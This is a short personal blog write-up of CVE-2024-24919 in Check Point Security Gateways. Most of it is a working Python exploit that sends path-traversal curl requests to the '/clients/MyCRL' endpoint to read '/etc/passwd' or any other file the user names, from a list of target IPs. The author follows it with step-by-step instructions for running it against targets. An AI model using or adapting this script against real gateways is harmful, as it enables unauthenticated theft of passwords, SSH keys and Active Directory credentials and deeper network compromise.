skip to content
Yupy Syntax

CVE-2024-24919 - Write Up

/ 3 min read

Last Updated:
cve

CVE-2024-24919 Write Up

Haii!! How are you?!!

This time I will share an article about the findings I found on a website that is vulnerable to the CVE-2024-24919 vulnerability. okay, let’s get straight to it.

Details Information Vulnerability:

This security vulnerability allows attackers to access certain Check Point Security Gateways connected to the internet and activate the Remote Access VPN feature or Mobile Access Software Blades information. A security update for this vulnerability is available.

CVSS ScoreSeverity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:NCritical (8.6)

Proof of Concept (PoC):

Exploit

CVE-2024-24919.py
import subprocess
# ANSI escape codes for coloring
BLUE = '\033[94m'
ORANGE = '\033[93m'
GREEN = '\033[92m'
RED = '\033[91m'
RESET = '\033[0m'
def check_vulnerability(ip, file_name="etc/passwd"):
# Try different curl commands with various SSL options
commands = [
# Disable SSL verification
f"curl -i -s -k -X POST \
-H 'Host: {ip}' \
-H 'Content-Length: 39' \
--data-binary 'aCSHELL/../../../../../../../{file_name}' \
'https://{ip}/clients/MyCRL'",
# Specify SSL version (TLSv1.2)
f"curl -i -s -k -X POST \
-H 'Host: {ip}' \
-H 'Content-Length: 39' \
--data-binary 'aCSHELL/../../../../../../../{file_name}' \
--tlsv1.2 \
'https://{ip}/clients/MyCRL'"
]
for command in commands:
try:
output = subprocess.check_output(command, shell=True, text=True)
if any(word in output for word in ["root", "admin", "nobody"]):
print(f"{GREEN}{ip} is vulnerable.{RESET}")
return "vulnerable", output
except subprocess.CalledProcessError as e:
continue
print(f"{RED}{ip} is not vulnerable.{RESET}")
return "not-vulnerable", None
def main():
try:
with open('domain-IP.txt', 'r') as file:
ips = file.readlines()
except FileNotFoundError:
print(f"{RED}Error: The file 'domain-IP.txt' was not found.{RESET}")
return
for ip in ips:
ip = ip.strip() # Remove any leading/trailing whitespace or newlines
if ip:
result, output = check_vulnerability(ip)
if result == "vulnerable":
# Ask if the user wants to print the response body data
print_response = input(f"{BLUE}Do you want to print the response body data? (Yes/No):{RESET} ").strip().lower()
if print_response == "yes":
print(f"{GREEN}{output}{RESET}")
# Ask if the user wants to change the directory
change_dir = input(f"{BLUE}Do you want to change the directory of the file? (Yes/No):{RESET} ").strip().lower()
if change_dir == "yes":
new_file_name = input(f"{ORANGE}Please enter the new file name to replace 'etc/passwd':{RESET} ").strip()
# Call the function again with the new file name
result, output = check_vulnerability(ip, new_file_name)
if result == "vulnerable" and output:
print(f"With new file name '{new_file_name}':")
print(f"{GREEN}{output}{RESET}")
if __name__ == "__main__":
main()

Now try to exploit it with the python script above in this way

  1. Enter the target IP into the file domain-IP.txt
  2. run python3 CVE-2024-24919.py
alt text alt text

Impact:

This vulnerability could allow an unauthenticated, remote attacker to read local files of an affected Security Gateway, including sensitive files such as password data, SSH keys, or other credentials. Under certain conditions, this can lead to credential theft, lateral movement within the network, and potential overall system compromise. It has been observed that this exploit is already occurring in the real world to extract Active Directory credentials.

References: